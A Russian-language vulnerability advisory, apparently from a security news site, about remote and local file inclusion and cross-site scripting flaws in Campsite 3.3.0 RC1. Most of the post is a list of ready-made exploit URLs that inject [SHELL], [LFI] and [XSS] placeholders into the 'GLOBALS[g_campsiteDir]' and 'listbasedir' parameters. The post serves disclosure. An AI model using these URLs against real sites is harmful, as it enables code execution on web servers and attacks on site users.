• Партнер

  • Программа: Campsite 3.3.0 RC1

    Уязвимость позволяет удаленному пользователю осуществить XSS нападение и
    выполнить произвольный PHP сценарий на целевой системе.

    1) Уязвимость существует из-за недостаточной обработки входных данных в
    параметре «GLOBALS[g_campsiteDir]» множественными сценариями. Удаленный
    пользователь может выполнить произвольный PHP сценарий на целевой системе с
    привилегиями Web сервера.

    Эксплоит:

    [RFI]
    http://localhost/path/implementation/site/admin-files/ad_popup.php?GLOBALS[g_campsiteDir]=[SHELL]
    http://localhost/path/implementation/site/admin-files/camp_html.php?GLOBALS[g_campsiteDir]=[SHELL]
    http://localhost/path/implementation/site/admin-files/init_content.php?GLOBALS[g_campsiteDir]=[SHELL]
    http://localhost/path/implementation/site/admin-files/logout.php?GLOBALS[g_campsiteDir]=[SHELL]
    http://localhost/path/implementation/site/admin-files/menu.php?GLOBALS[g_campsiteDir]=[SHELL]
    http://localhost/path/implementation/site/admin-files/set-author.php?GLOBALS[g_campsiteDir]=[SHELL]
    http://localhost/path/implementation/site/conf/liveuser_configuration.php?GLOBALS[g_campsiteDir]=[SHELL]
    http://localhost/path/implementation/site/include/phorum_load.php?GLOBALS[g_campsiteDir]=[SHELL]
    http://localhost/path/implementation/site/admin-files/article_import/CommandProcessor.php?GLOBALS[g_campsiteDir]=[SHELL]
    http://localhost/path/implementation/site/admin-files/article_import/index.php?GLOBALS[g_campsiteDir]=[SHELL]
    http://localhost/path/implementation/site/admin-files/articles/add.php?GLOBALS[g_campsiteDir]=[SHELL]
    http://localhost/path/implementation/site/admin-files/articles/add_move.php?GLOBALS[g_campsiteDir]=[SHELL]
    http://localhost/path/implementation/site/admin-files/articles/autopublish.php?GLOBALS[g_campsiteDir]=[SHELL]
    http://localhost/path/implementation/site/admin-files/articles/autopublish_del.php?GLOBALS[g_campsiteDir]=[SHELL]

    [LFI]

    http://localhost/path/implementation/site/admin-files/ad.php?GLOBALS[g_campsiteDir]=[LFI]

    2) Уязвимость существует из-за недостаточной обработки входных данных в
    параметре «listbasedir» сценарием list_dir.php. Атакующий может выполнить
    произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
    сайта.

    Эксплоит:

    http://localhost/path/implementation/site/admin-files/templates/list_dir.php?listbasedir=[XSS]

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии